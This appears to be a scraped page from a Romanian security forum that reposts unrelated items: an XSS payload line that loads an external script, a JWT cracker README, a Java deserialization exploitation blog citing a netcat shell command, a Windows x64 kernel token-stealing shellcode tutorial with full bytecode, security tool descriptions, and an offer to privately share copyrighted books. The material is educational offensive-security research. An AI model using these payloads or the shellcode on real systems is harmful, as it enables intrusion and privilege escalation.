Leaderboard

Will this presentation make me an optical engineer? Maybe, but just remember, I omitted almost all the math. The purpose of this tutorial is to touch on a little bit of every topic, from the mundane to the advanced and unusual. But it helps to have a basic understanding of how and why things work, even if you aren’t designing fiber networks. https://www.nanog.org/sites/default/files/2_Steenbergen_Tutorial_New_And_v2.pdf

Atata se da lumea cu fundul de pamant pe forumuri si pe net in general ca vezi-doamne, platesc bani, etc. Cateva motive pentru care nu vor plati nici un ban: - nu au nici o garantie ca se vor tine de cuvant si nu vor posta nimic in public - nu au nici o garantie ca dupa ce vor primi anumite sume nu vor cere mai mult ca sa nu posteze in public - ar fi suicid din punct de vedere PR (mai ales cum muricanii au lozinca "we don't negotiate with terrorists") si ar fi linsati mediatic, ridiculizati, etc. I-ar costa mult mai mult marketing-ul si advertising-ul dupa - ar da tonul si invita in mod indirect si alte atacuri. Daca ar vedea indienii si pakistanezii ca platesc pai ar sta in carca lor 24/7. Sa nu mai vorbim de rusi, chinezi si alte cele. - momentan probabil vor sa traga de timp caci mai sunt 2 episoade din Game of Thrones si apoi ii doare la basca. Vor sa dea si cat mai mult timp celor de la FBI care sunt pe fir - astfel de intelegeri se fac de obicei in mod foarte discret, cu oameni inteligenti pe ambele parti, fara tam-tam mediatic. Spre exemplu pe o platforma unde ma uitam sa investesc acum ceva vreme, au avut un breach si apoi extract din info ce am primit:

Bati campii rau de tot cu asta. Stau in aceeasi casa, respira acelasi aer, mananca impreuna, au planuri de viata impreuna. Nu crezi ca ar fi mai ok ca ea sa dea cartile pe fata daca o arde aiurea? Se vede ca esti inca necopt. Stai o viata alaturi de un om si tot nu ajungi sa-l cunosti. Crezi ca la toate dai cu programare cand nu mai merg lucrurile sau cand nu-ti convine ceva? Internetu' nu e viata. Ce vorbeste el acolo, e viata. Mai iesi si tu din casa, du-te si imbata-te, mergi la curve, lasa fitilele astea.

%00%00%00%00%00%00%00<script%20src=http://xss.rocks/xss.js ></script> Sursa: https://twitter.com/0rbz_/status/896896095862669312

JWT cracker A multi-threaded JWT brute-force cracker written in C. If you are very lucky or have a huge computing power, this program should find the secret key of a JWT token, allowing you to forge valid tokens. This is for testing purposes only, do not put yourself in trouble I used the Apple Base64 implementation that I modified slightly. Compile Make sure you have openssl's headers installed. On Ubuntu you can install them with apt-get install libssl-dev make If you use a Mac, you can install OpenSSL with brew install openssl, but the headers will be stored in a different location: make OPENSSL=/usr/local/opt/openssl/include OPENSSL_LIB=-L/usr/local/opt/openssl/lib Run $ > ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE In the above example, the key is Sn1f. It takes approximately 2 seconds to crack on my Macbook. Contribute No progress status If you stop the program, you cannot start back where you were IMPORTANT: Known bugs The base64 implementation I use (from Apple) is sometimes buggy because not every Base64 implementation is the same. So sometimes, decrypting of your Base64 token will only work partially and thus you will be able to find a secret to your token that is not the correct one. If someone is willing to implement a more robust Base64 implementation, that would be great Download c-jwt-cracker-master.zip Source: https://github.com/brendan-rius/c-jwt-cracker

Attacking Java Deserialization Deserialization vulnerabilities are far from new, but exploiting them is more involved than other common vulnerability classes. During a recent client engagement I was able to take advantage of Java deserialization to gain a foothold on a server from where I was able to obtain root access to tens of servers spanning pre-production and production environments across multiple data centres. The vulnerability I discovered had previously survived multiple pentests and I would have missed it too if I hadn’t had prior exposure to Java (de)serialization. In this blog post I’ll attempt to clear up some confusion around deserialization vulnerabilities and hopefully lower the bar to entry in exploiting them using readily available tools. I’ll be focusing on Java, however the same concepts apply to other languages. I’ll also be focusing on command execution exploits in order to keep things simple. I spoke about this topic at SteelCon this year and will also be speaking on the topic at BSides Manchester and BSides Belfast (on that note, I’m also speaking about poking one of Java’s back doors at 44con this year)! (De)serialization Briefly, serialization is the process of converting runtime variables and program objects into a form that can be stored or transmitted. Deserialization is the reverse process that converts the serialized form back into in-memory variables and program objects. The serialized form could be a text-based format such as JSON or XML, or a binary format. Many higher level languages such as C#, Java, and PHP have built-in support for data serialization which is trivial to use and saves the developer from having to implement these routines themselves. In this blog post I’ll be focusing on Java’s built-in serialization format but other formats can come with similar risks (check out Alvaro Muñoz and Oleksandr Mirosh’s Black Hat USA 2017 and Def Con 25 talk Friday the 13th: JSON Attacks for more on this). What’s the Problem? The use of (de)serialization isn’t a problem itself. Problems arise when a user (attacker) can control the data being deserialized, for example if data can be delivered to the deserialization routine over a network connection. If an attacker has control of data being deserialized, then they have some influence over in-memory variables and program objects. Subsequently, if an attacker can influence in-memory variables and program objects, then they can influence the flow of code that uses those variables and objects. Let’s look at an example of Java deserialization: public class Session { public String username; public boolean loggedIn; public void loadSession(byte[] sessionData) throws Exception { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sessionData)); this.username = ois.readUTF(); this.loggedIn = ois.readBoolean(); } } 1 2 3 4 5 6 7 8 9 10 public class Session { public String username; public boolean loggedIn; public void loadSession(byte[] sessionData) throws Exception { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sessionData)); this.username = ois.readUTF(); this.loggedIn = ois.readBoolean(); } } The ‘loadSession’ method accepts an array of bytes as a parameter and deserializes a string and a boolean from that byte array into the ‘username’ and ‘loggedIn’ properties of the object. If an attacker can control the contents of the ‘sessionData’ byte array passed to this method then they can control these object properties. The following is an example of how this Session object might be used: public class UserSettingsController { public void updatePassword(Session session, String newPassword) throws Exception { if(session.loggedIn) { UserModel.updatePassword(session.username, newPassword); } else { throw new Exception("Error: User not logged in."); } } } 1 2 3 4 5 6 7 8 9 public class UserSettingsController { public void updatePassword(Session session, String newPassword) throws Exception { if(session.loggedIn) { UserModel.updatePassword(session.username, newPassword); } else { throw new Exception("Error: User not logged in."); } } } If the session is logged in then the password for the user whose username is stored in the session is updated to the given value. This is a simple example of a ‘POP Gadget’, a snippet of code that we have some control over via the properties of an object. Property-Oriented Programming When we control object properties and use them to influence the flow of code execution in this way we are doing what’s known as ‘property-oriented programming’. A POP gadget is a code snippet that we can influence to our advantage by manipulating the properties of some object. Often multiple gadgets will need chaining in order to create a complete exploit. We can think of this as high-level ROP (return-oriented programming – a technique used in memory corruption exploits) except that instead of a ROP gadget pushing a value onto the stack, a POP gadget might allow us to write some data to a file. An important point here is that a deserialization exploit does not involve sending classes or code to the server to execute. We’re simply sending the properties of classes that the server is already aware of in order to manipulate existing code that deals with those properties. A successful exploit hence relies on knowledge of the code that can be manipulated through deserialization. This is where a lot of the difficulty in exploiting deserialization vulnerabilities stems from. Interesting Gadgets POP gadgets can exist anywhere in a program, the only requirements are that the code can be manipulated using the properties of deserialized objects, and that an attacker can control the data being deserialized. Some gadgets are of greater interest, however, because their execution is more predictable. In Java, a serializable class can define a method named ‘readObject‘ which can be used to perform special handling during deserialization (for example supporting backwards compatibility). This method can also be used to respond to the event of an object of that class being deserialized. An example use of this method might be for a database manager object to automatically establish a connection to the database when it is deserialized into memory. Most Java serialization exploits take advantage of the code within these readObject methods because the code is guaranteed to be executed during deserialization. Exploiting Deserialization To exploit a deserialization vulnerability we need two key things: An entry point that allows us to send our own serialized objects to the target for deserialization. One or more code snippets that we can manipulate through deserialization. Entry Points We can identify entry points for deserialization vulnerabilities by reviewing application source code for the use of the class ‘java.io.ObjectInputStream’ (and specifically the ‘readObject’ method), or for serializable classes that implement the ‘readObject’ method. If an attacker can manipulate the data that is provided to the ObjectInputStream then that data presents an entry point for deserialization attacks. Alternatively, or if the Java source code is unavailable, we can look for serialized data being stored on disk or transmitted over the network, provided we know what to look for! The Java serialization format begins with a two-byte magic number which is always hex 0xAC ED. This is followed by a two-byte version number. I’ve only ever seen version 5 (0x00 05) but earlier versions may exist and in future later versions may also exist. Following the four-byte header are one or more content elements, the first byte of each should be in the range 0x70 to 0x7E and describes the type of the content element which is used to infer the structure of the following data in the stream. For more details see Oracle’s documentation on the Object Serialization Stream Protocol. People often say to look for the four-byte sequence 0xAC ED 00 05 in order to identify Java serialization, and in fact some IDS signatures look for this sequence to detect attacks. During my recent client engagement I didn’t immediately see those four bytes because the target client application kept a network connection to the server open the entire time it was running and the four-byte header only exists once at the very beginning of a serialization stream. The client’s IDS missed my attacks for this reason – my payloads were sent later in the stream and separately from the serialization header. We can use an ASCII dump to help identify Java serialization data without relying on the four-byte 0xAC ED 00 05 header. The most obvious indicator of Java serialization data is the presence of Java class names in the dump, such as ‘java.rmi.dgc.Lease’. In some cases Java class names might appear in an alternative format that begins with an ‘L’, ends with a ‘;’, and uses forward slashes to separate namespace parts and the class name (e.g. ‘Ljava/rmi/dgc/VMID;’). Along with Java class names, there are some other common strings that appear due to the serialization format specification, such as ‘sr’ which may represent an object (TC_OBJECT) followed by its class description (TC_CLASSDESC), or ‘xp’ which may indicate the end of the class annotations (TC_ENDBLOCKDATA) for a class which has no super class (TC_NULL). Having identified the use of serialized data, we need to identify the offset into that data where we can actually inject a payload. The target needs to call ‘ObjectInputStream.readObject’ in order to deserialize and instantiate an object (payload) and support property-oriented programming, however it could call other ObjectInputStream methods first, such as ‘readInt’ which will simply read a 4-byte integer from the stream. The readObject method will read the following content types from a serialization stream: 0x70 – TC_NULL 0x71 – TC_REFERENCE 0x72 – TC_CLASSDESC 0x73 – TC_OBJECT 0x74 – TC_STRING 0x75 – TC_ARRAY 0x76 – TC_CLASS 0x7B – TC_EXCEPTION 0x7C – TC_LONGSTRING 0x7D – TC_PROXYCLASSDESC 0x7E – TC_ENUM In the simplest cases an object will be the first thing read from the serialization stream and we can insert our payload directly after the 4-byte serialization header. We can identify those cases by looking at the first five bytes of the serialization stream. If those five bytes are a four-byte serialization header (0xAC ED 00 05) followed by one of the values listed above then we can attack the target by sending our own four-byte serialization header followed by a payload object. In other cases, the four-byte serialization header will most likely be followed by a TC_BLOCKDATA element (0x77) or a TC_BLOCKDATALONG element (0x7A). The former consists of a single byte length field followed by that many bytes making up the actual block data and the latter consists of a four-byte length field followed by that many bytes making up the block of data. If the block data is followed by one of the element types supported by readObject then we can inject a payload after the block data. I wrote a tool to support some of my research in this area, SerializationDumper, which we can use to identify entry points for deserialization exploits. The tool parses Java serialization streams and dumps them out in a human-readable form. If the stream contains one of the element types supported by readObject then we can replace that element with a payload object. Below is an example of its use: $ java -jar SerializationDumper-v1.0.jar ACED00057708af743f8c1d120cb974000441424344 STREAM_MAGIC - 0xac ed STREAM_VERSION - 0x00 05 Contents TC_BLOCKDATA - 0x77 Length - 8 - 0x08 Contents - 0xaf743f8c1d120cb9 TC_STRING - 0x74 newHandle 0x00 7e 00 00 Length - 4 - 0x00 04 Value - ABCD - 0x41424344 1 2 3 4 5 6 7 8 9 10 11 $ java -jar SerializationDumper-v1.0.jar ACED00057708af743f8c1d120cb974000441424344 STREAM_MAGIC - 0xac ed STREAM_VERSION - 0x00 05 Contents TC_BLOCKDATA - 0x77 Length - 8 - 0x08 Contents - 0xaf743f8c1d120cb9 TC_STRING - 0x74 newHandle 0x00 7e 00 00 Length - 4 - 0x00 04 Value - ABCD - 0x41424344 In this example the stream contains a TC_BLOCKDATA followed by a TC_STRING which can be replaced with a payload. Objects in a serialization stream are instantiated as they are loaded, rather than after the entire stream has been parsed. This fact allows us to inject payloads into a serialization stream without worrying about correcting the remainder of the stream. The payload will be deserialized and executed before any kind of validation happens and before the application attempts to read further data from the serialization stream. POP Gadgets Having identified an entry point that allows us to provide our own serialized objects for the target to deserialize, the next thing we need are POP gadgets. If we have access to the source code then we can look for ‘readObject’ methods and code following calls to ‘ObjectInputStream.readObject’ in order to work out what potential gadgets exist. Often we don’t have access to application source code but this doesn’t prevent us from exploiting deserialization vulnerabilities because there are lots of commonly used third-party libraries that can be targeted. Researchers including Chris Frohoff and Gabriel Lawrence have already found POP gadget chains in various libraries and released a tool called ‘ysoserial‘ that can generate payload objects. This tool greatly simplifies the process of attacking Java deserialization vulnerabilities! There are a lot of gadget chains included in ysoserial so the next step is to work out which, if any, can be used against the target. Background knowledge about the third-party libraries used by the application, or an information disclosure issue, should be the first port of call. If we know which third-party libraries are used by the target then we can select the appropriate ysoserial payload(s) to try. Unfortunately this information might not be readily available in which case we can, with caution, cycle through the various ysoserial gadget chains until we find one we can use. Care should be taken with this approach as there is always a risk of triggering an unhandled exception and crashing the target application. The target would have to be particularly unstable for this to happen, however, as even an nmap version scan would likely cause the target to crash if it couldn’t handle unexpected/malformed data. If the target application responds to a ysoserial payload with a ‘ClassNotFoundException’ then chances are that the library targeted by the chosen gadget chain is not available to the target application. A ‘java.io.IOException’ with the message ‘Cannot run program’ likely means that the gadget chain worked, however the operating system command that the gadget chain attempted to execute was not available on the server. The ysoserial command execution payloads are blind payloads and the command output is not returned. There are also a couple of limitations due to the use of ‘java.lang.Runtime.exec(String)’. The first is that shell operators such as output redirection and piping are not supported. The second is that parameters to the payload command cannot contain spaces (e.g. we can use “nc -lp 31313 -e /bin/sh” but we can’t use “perl -e ‘use Socket;…'” because the parameter to perl contains a space). Fortunately there’s a nice payload encoder/generator available online which can get around these limitations here: http://jackson.thuraisamy.me/runtime-exec-payloads.html. Try it Yourself – DeserLab and SerialBrute It’s important to understand serialization and how deserialization exploits work (e.g. property-oriented programming) in order to effectively exploit deserialization vulnerabilities. Doing so is still more involved than other common vulnerability classes so it’s helpful to have a target to practice on. Along with this blog post, I’ve created and released a demo application called ‘DeserLab‘ that implements a custom network protocol on top of the Java serialization format. The application is vulnerable to deserialization attacks and should be exploitable using the information provided in this blog post. ‘SerialBrute‘ is a pair of Python scripts that I wrote and use to automate testing of ysoserial payloads against arbitrary targets. The first, SerialBrute.py’, can replay a TCP conversation or HTTP request and inject a payload at a given point while the second, ‘SrlBrt.py’ is a skeleton script that can be altered to deliver payloads where special processing is needed. Both attempt to detect valid and invalid payloads by looking at returned exceptions. These scripts are not intended to be full blown or polished attack tools and should be used with caution due to the risk of knocking an application over but I’ve personally had great success replaying TCP conversations and injecting ysoserial gadget chains. Thanks for reading! Have a go at DeserLab if this is something you’re interested in and if there’s anything I’ve missed, anything that could do with further explanation, or you have any questions or feedback please leave a comment or get in touch on Twitter (@NickstaDB)! Sursa: https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/

AUTHENTICATION SERVER The idea behind Isolate is that we should somehow manage how do people get access to our servers. How can we make this process more secure? How could we prevent a system from being compromised when someone lost the laptop with ssh key. What would we do in case someone quits the company - is there an alternative to just changing all passwords, keys, etc? Isolate adds OTP 2FA to SSH login. It could be hardware YubiKey or Google Authenticator app. If someone lost the password - OTP key is here and the intruder can't get access to the bastion host. Users don't get direct access to endpoint servers - they go there through Isolate server, the system tracks their actions. You can easily manage access to the bastion server - add/remove users, etc. Technically you should generate and place the bastion host key on endpoint servers, and users will get regular access to Isolate server with the sudoer access to ssh command. Once they want to connect to the endpoint server, the system executes ssh command and ssh client running with privileged user permissions gets server key and using it the system gets access to the server we need to get access to. Supports OTP (counter and time based) 2FA algorithms SSH sessions logging Requirements Fresh CentOS 7 / Ubuntu 16.04 / Debian 9 setup Ansible 2.3+ for install or update Installation https://github.com/itsumma/isolate#install Download isolate-master.zip Source: https://github.com/itsumma/isolate

A Primer to Windows x64 shellcoding • Posted by hugsy on August 14, 2017 • windows • kernel • debugging • exploit • token • shellcode Continuing on the path to Windows kernel exploitation… Thanks to the previous post, we now have a working lab for easily (and in a reasonably fast manner) debug Windows kernel. Let’s skip ahead for a minute and assume we control PC using some vulnerability in kernel land (next post), then we may want to jump back into a user allocated buffer to execute a control shellcode. So where do we go from now? How to transform this controlled PC in the kernel-land into a privileged process in user-land? The classic technique is to steal the System process token and copy it into the structure of our targeted arbitrary (but unprivileged) process (say cmd.exe). Note: our target here will the Modern.IE Windows 8.1 x64 we created in the previous post, that we’ll interact with using kd via Network debugging. Refer to previous post if you need to set it up. Stealing SYSTEM token using kd The !process extension of WinDBG provides a structured display of one or all the processes. kd> !process 0 0 System PROCESS ffffe000baa6c040 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 001a7000 ObjectTable: ffffc0002f403000 HandleCount: <Data Not Accessible> Image: System This leaks the address of the _EPROCESS structure in the kernel, of the proces named System. Using dt will provide a lot more info (here, massively truncated to what interests us): kd> dt _EPROCESS ffffe000baa6c040 ntdll!_EPROCESS +0x000 Pcb : _KPROCESS [...] +0x2e0 UniqueProcessId : 0x00000000`00000004 Void +0x2e8 ActiveProcessLinks : _LIST_ENTRY [ 0xffffe000`bbc54be8 - 0xfffff801`fed220a0 ] [...] +0x348 Token : _EX_FAST_REF [...] +0x430 PageDirectoryPte : 0 +0x438 ImageFileName : [15] "System" At nt!_EPROCESS.Token (+0x348) we get the process token, which holds a pointer to an “Executive Fast Reference” structure. kd> dt nt!_EX_FAST_REF ffffe000baa6c040+348 +0x000 Object : 0xffffc000`2f405598 Void +0x000 RefCnt : 0y1000 +0x000 Value : 0xffffc000`2f405598 If we nullify the last nibble of the address (i.e. AND with -0xf on x64, -7 on x86), we end up having the System token’s address: kd> ? 0xffffc000`2f405598 & -f Evaluate expression: -70367951432304 = ffffc000`2f405590 kd> dt nt!_TOKEN ffffc000`2f405590 +0x000 TokenSource : _TOKEN_SOURCE +0x010 TokenId : _LUID +0x018 AuthenticationId : _LUID +0x020 ParentTokenId : _LUID +0x028 ExpirationTime : _LARGE_INTEGER 0x06207526`b64ceb90 +0x030 TokenLock : 0xffffe000`baa4ef90 _ERESOURCE +0x038 ModifiedId : _LUID +0x040 Privileges : _SEP_TOKEN_PRIVILEGES +0x058 AuditPolicy : _SEP_AUDIT_POLICY [...] Note: the WinDBG extension !token provides a more detailed (and parsed) output. You might to refer to it instead whenever you are analyzing tokens. So basically, if we create a process (say cmd.exe), and overwrite its token with the System token value we found (0xffffc0002f405590), our process will be running as System. Let’s try! We search our process using kd: kd> !process 0 0 cmd.exe PROCESS ffffe000babfd900 SessionId: 1 Cid: 09fc Peb: 7ff6fa81c000 ParentCid: 0714 DirBase: 45c4c000 ObjectTable: ffffc00036d03940 HandleCount: <Data Not Accessible> Image: cmd.exe Overwrite the offset 0x348 with the SYSTEM token pointer (0xffffc0002f405590). kd> dq ffffe000bc043900+348 l1 ffffe000`bc043c48 ffffc000`30723426 kd> eq 0xffffe000babfd900+0x348 0xffffc0002f405590 And tada … Now we know how to transform any unprivileged process into a privileged one using kd. Shellcoding our way to SYSTEM So the basic idea now, to reproduce the same steps that we did in the last part, but from our shellcode. So we need: A pointer to System EPROCESS structure, and save the token (located at offset +0x348) Look up for the current process EPROCESS structure Overwrite its token with System’s Profit! Getting the current process structure address Pointers to process structures on Windows are stored in a doubly linked list (see the member ActiveProcessLinks of nt!_EPROCESS in kd). If we have the address to one process, we can “scroll” back and forward to discover the others. But first, we need to get the address of at the least one process in the kernel. This is exactly the purpose of the routine nt!PsGetCurrentProcess, but since we can’t call it directly (thank you ASLR), we can still check what is it doing under the hood: kd> uf nt!PsGetCurrentProcess nt!PsGetCurrentProcess: fffff801`feb06e84 65488b042588010000 mov rax,qword ptr gs:[188h] fffff801`feb06e8d 488b80b8000000 mov rax,qword ptr [rax+0B8h] fffff801`feb06e94 c3 ret kd> dps gs:188 l1 002b:00000000`00000188 fffff801`fedbfa00 nt!KiInitialThread mov rax, qword ptr gs:[188h] returns a pointer to an _ETHREAD structure (more specifically the kernel thread (KTHREAD) nt!KiInitialThread). If we check the content of this structure at the offset 0xb8, we find the structure to the current process: kd> dt nt!_EPROCESS poi(nt!KiInitialThread+b8) +0x000 Pcb : _KPROCESS [...] +0x2e0 UniqueProcessId : 0x00000000`00000004 Void +0x2e8 ActiveProcessLinks : _LIST_ENTRY [ 0xffffe000`bbc54be8 - 0xfffff801`fed220a0 ] [...] +0x348 Token : _EX_FAST_REF So now we know where our current process resides in the kernel (just like kd gave us using !process 0 0 cmd.exe earlier), and therefore the first of our shellcode: mov rax, gs:0x188 mov rax, [rax + 0xb8] Browsing through the process list to reach System The processes are stored in the ActiveProcessLinks (offset 0x2e8) of the nt!_EPROCESS structure, via a _LIST_ENTRY, which is a doubly linked list in its simplest form: kd> dt _LIST_ENTRY ntdll!_LIST_ENTRY +0x000 Flink : Ptr64 _LIST_ENTRY +0x008 Blink : Ptr64 _LIST_ENTRY Since we know that System process ID is 4, we can write a very small loop in assembly, whose pseudo-C code would be: ptrProcess = curProcess while ptrProcess->UniqueProcessId != SystemProcess->UniqueProcessId (4) { ptrProcess = ptrProcess->Flink } Which builds the second part of our shellcode: ;; rax has the pointer to the current KPROCESS mov rbx, rax __loop: mov rbx, [rbx + 0x2e8] ;; +0x2e8 ActiveProcessLinks[0].Flink sub rbx, 0x2e8 ;; nextProcess mov rcx, [rbx + 0x2e0] ;; +0x2e0 UniqueProcessId cmp rcx, 4 ;; compare to target PID jnz __loop ;; here rbx hold a pointer to System structure Overwrite the current process token field with System’s This is the third and final part of our shellcode, and the easiest since everything was done in the steps above: ;; rax has the pointer to the current KPROCESS ;; rbx has the pointer to System KPROCESS mov rcx, [rbx + 0x348] ;; +0x348 Token and cl, 0xf0 ;; we must clear the lowest nibble mov [rax + 0x348], rcx The final shellcode We add a few extra instructions to correctly save and restore the context, and make sure we exit cleanly: ;; ;; Token stealing shellcode for Windows 8.1 x64 ;; ;; Save the current context on the stack push rax push rbx push rcx ;; Get the current process mov rax, gs:0x188 mov rax, [rax+0xb8] ;; Loop looking for System PID mov rbx, rax mov rbx, [rbx+0x2e8] sub rbx, 0x2e8 mov rcx, [rbx+0x2e0] cmp rcx, 4 jnz -0x19 ;; Token overwrite mov rcx, [rbx + 0x348] and cl, 0xf0 mov [rax + 0x348], rcx ;; Cleanup pop rcx pop rbx pop rax pop rax pop rax pop rax pop rax pop rax xor rax, rax ret view raw win81-token-stealing-shellcode.asm hosted with ❤ by GitHub We can now simply use any assembler (NASM, YASM) - but I have a personal preference for Keystone-Engine - to generate a bytecode version of our shellcode. #define LEN 80 const char sc[LEN] = "" "\x50" // push rax "\x53" // push rbx "\x51" // push rcx "\x48\x65\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // mov rax, gs:0x188 "\x48\x8b\x80\xb8\x00\x00\x00" // mov rax, [rax+0xb8] "\x48\x89\xc3" // mov rbx, rax "\x48\x8b\x9b\xe8\x02\x00\x00" // mov rbx, [rbx+0x2e8] "\x48\x81\xeb\xe8\x02\x00\x00" // sub rbx, 0x2e8 "\x48\x8b\x8b\xe0\x02\x00\x00" // mov rcx, [rbx+0x2e0] "\x48\x83\xf9\x04" // cmp rcx, 4 "\x75\x15" // jnz 0x17 "\x48\x8b\x8b\x48\x03\x00\x00" // mov rcx, [rbx + 0x348] "\x48\x89\x88\x48\x03\x00\x00" // mov [rax + 0x348], rcx "\x59" // pop rcx "\x5b" // pop rbx "\x58" // pop rax "\x58\x58\x58\x58\x58" // pop rax; pop rax; pop rax; pop rax; pop rax; (required for proper stack return) "\x48\x31\xc0" // xor rax, rax (i.e. NT_SUCCESS) "\xc3" // ret ""; Once copied into an executable location, this shellcode will grant the current process with all System privileges. The next post will actually use this newly created shellcode in a concrete vulnerability exploitation (from the Extremely Vulnerable Driver by HackSys Team). Until then, take care! Recommended readings A Guide to Kernel Exploitation - Attacking The Core Introduction To Windows Shellcode Development x64 Kernel Privilege Escalation Well-Known Security IDentifiers Sursa: https://blahcat.github.io/2017/08/14/a-primer-to-windows-x64-shellcoding/

Friday the 13 JSON Attacks Alvaro Muñoz & Oleksandr Mirosh HPE Software Security Research Introduction Security issues with deserialization of untrusted data in several programming languages have been known for many years. However, it got major attention on 2016 which will be remembered as the year of Java Deserialization apocalypse. Despite being a known attack vector since 2011, the lack of know n classes leading to arbitrary code execution in popular libraries or even the Java Runtime allowed Java Deserialization vulnerabilities fly under the radar for a long time. These classes could be used to execute arbitrary code or run arbitrary processes (remote code execution or RCE gadgets). In 2015 Frohoff and Lawrence published an RCE gadget in the Apache Commons - Collections library which was used by many applications and therefore caught many applications deserializing untrusted data off - guard. The publication of the Apache Commons - Collections gadget was followed by an explosion of new research on gadgets, defense and bypass techniques and by the hunting of vulnerable products/endpoints. Download: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf

Description SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates. This software was created by Roland Bischofberger and Emanuel Duss during a bachelor thesis at the Hochschule für Technik Rapperswil (HSR). Our project partner and advisor was Compass Security Schweiz AG. We thank Compass for the nice collaboration and support during our bachelor thesis. Features The extension is divided in two parts. A SAML message editor and a certificate management tool. Message Editor Features of the SAML Raider message editor: Sign SAML Messages Sign SAML Assertions Remove Signatures Edit SAML Message (Supported Messages: SAMLRequest and SAMLResponse) Preview eight common XSW Attacks Execute eight common XSW Attacks Send certificate to SAMl Raider Certificate Management Undo all changes of a SAML Message Supported Profiles: SAML Webbrowser Single Sign-on Profile, Web Services Security SAML Token Profile Supported Bindings: POST Binding, Redirect Binding, SOAP Binding, URI Binding Certificate Management Features of the SAML Raider Certificate Management: Import X.509 certificates (PEM and DER format) Import X.509 certificate chains Export X.509 certificates (PEM format) Delete imported X.509 certificates Display informations of X.509 certificates Import private keys (PKCD#8 in DER format and traditional RSA in PEM Format) Export private keys (traditional RSA Key PEM Format) Cloning X.509 certificates Cloning X.509 certificate chains Create new X.509 certificates Editing and self-sign existing X.509 certificates Download: saml-raider-1.2.1.jar Installation: https://github.com/SAMLRaider/SAMLRaider#installation Source: https://github.com/SAMLRaider/SAMLRaider

Pentru cei carora le place sa citeasca, si se descurca cu engleza, ofer gratuit capitole sau urmatoarele (255) carti intregi in format PDF de pe CRCnetBASE, majoritatea nu pot fi gasite pe torrente sau site-uri de ebooks grauite. Din anumite motive bine intemeiate, imi rezerv dreptul de a trimite aceste carti doar anumitor persoane. Tinand cont ca e un proces manual si trebuie sa imi iau niste masuri de siguranta, e posibil sa dureze ceva daca doriti multe carti sau am un backlog de cereri. Pentru a vedea un rezumat/abstract al cartii inainte sa o cereti, si pentru a salva timpul meu si al vostru, recomand mai intai sa dati un search pe pagina aceasta la titlul cartii in acest field si in dreapta va aparea un pdf gratuit cu rezumatul/abstractul/contents: Cererile doar prin mesaj privat, aici doar intrebari/nelamuriri/probleme va rog. Thx. UPDATE: Va rog pentru inceput sa cereti doar cate putin, cat cititi odata, nu la gramada tot ce pare fain, ca sa pot servi pe toata lumea. Cand terminati mai trimit - nu plec niciunde. Thx. Lista completa a cartilor: 802.1X Port-Based Authentication A Practical Guide to Security Assessments A Practical Guide to Security Engineering and Information Assurance A Technical Guide to IPSec Virtual Private Networks Adaptive Security Management Architecture Advances in Biometrics for Secure Human Authentication and Recognition Algebraic and Stochastic Coding Theory Algebraic Curves in Cryptography Algorithmic Cryptanalysis An Introduction to Cryptography, Second Edition Android Malware and Analysis Android Security, Attacks and Defenses Anonymous Communication Networks, Protecting Privacy on the Web Architecting Secure Software Systems Assessing and Managing Security Risk in IT Systems, A Structured Methodology Asset Protection and Security Management Handbook Asset Protection through Security Awareness Audit and Trace Log Management, Consolidation and Analysis Authentication Codes and Combinatorial Designs Automatic Defense Against Zero-day Polymorphic Worms in Communication Networks Building A Global Information Assurance Program Building an Effective Information Security Policy Architecture Building an Information Security Awareness Program Building and Implementing a Security Certification and Accreditation Program, OFFICIAL (ISC)2 GUIDE to the CAPcm CBK Business Resumption Planning Call Center Continuity Planning Case Studies in Intelligent Computing, Achievements and Trends Case Studies in Secure Computing, Achievements and Trends CISO Soft Skills, Securing Organizations Impaired by Employee Politics, Apathy, and Intolerant Perspectives CISO's Guide to Penetration Testing, A Framework to Plan, Manage, and Maximize Benefits Complete Book of Remote Access, Connectivity and Security Complete Guide to CISM Certification Complete Guide to Security and Privacy Metrics, Measuring Regulatory Compliance, Operational Resilience, and ROI Computer Security Literacy, Staying Safe in a Digital World Conducting Network Penetration and Espionage in a Global Environment Conflict and Cooperation in Cyberspace, The Challenge to National Security Core Software Security, Security at the Source Critical Incident Management Critical Infrastructure System Security and Resiliency Critical Infrastructure, Understanding Its Component Parts, Vulnerabilities, Operating Risks, and Interdependencies Cryptanalysis of RSA and Its Variants Cultural Property Security, Protecting Museums, Historic Sites, Archives, and Libraries Curing the Patch Management Headache Cyber Crime Investigator's Field Guide, Second Edition Cyber Forensics, A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes Cyber Forensics, A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes, Second Edition Cyber Fraud, Tactics, Techniques and Procedures Cyber Power, Crime, Conflict and Security in Cyberspace Cyber Security Essentials Cybersecurity for Industrial Control Systems, SCADA, DCS, PLC, HMI, and SIS Cybersecurity, Public Sector Threats and Responses Cybervetting, Internet Searches for Vetting, Investigations, and Open-Source Intelligence, Second Edition Data Governance, Creating Value from Information Assets Data Mining and Machine Learning in Cybersecurity Data Mining Tools for Malware Detection Data Privacy for the Smart Grid Data Protection, Governance, Risk Management, and Compliance Database and Applications Security, Integrating Information Security and Data Management Data-driven Block Ciphers for Fast Telecommunication Systems Defense against the Black Arts, How Hackers Do What They Do and How to Protect against It Developing and Securing the Cloud Digital Forensics for Handheld Devices Digital Privacy, Theory, Technologies, and Practices Discrete Dynamical Systems and Chaotic Machines, Theory and Applications Disruptive Security Technologies with Mobile Code and Peer-to-Peer Networks Distributed Networks, Intelligence, Security, and Applications Effective Surveillance for Homeland Security, Balancing Technology and Social Issues Effective Use of Teams for IT Audits Elliptic Curves, Number Theory and Cryptography, Second Edition Group Theoretic Cryptography Handbook of Applied Cryptography Handbook of Elliptic and Hyperelliptic Curve Cryptography Handbook of Financial Cryptography and Security Handbook of Finite Fields Handbook of Surveillance Technologies, Third Edition 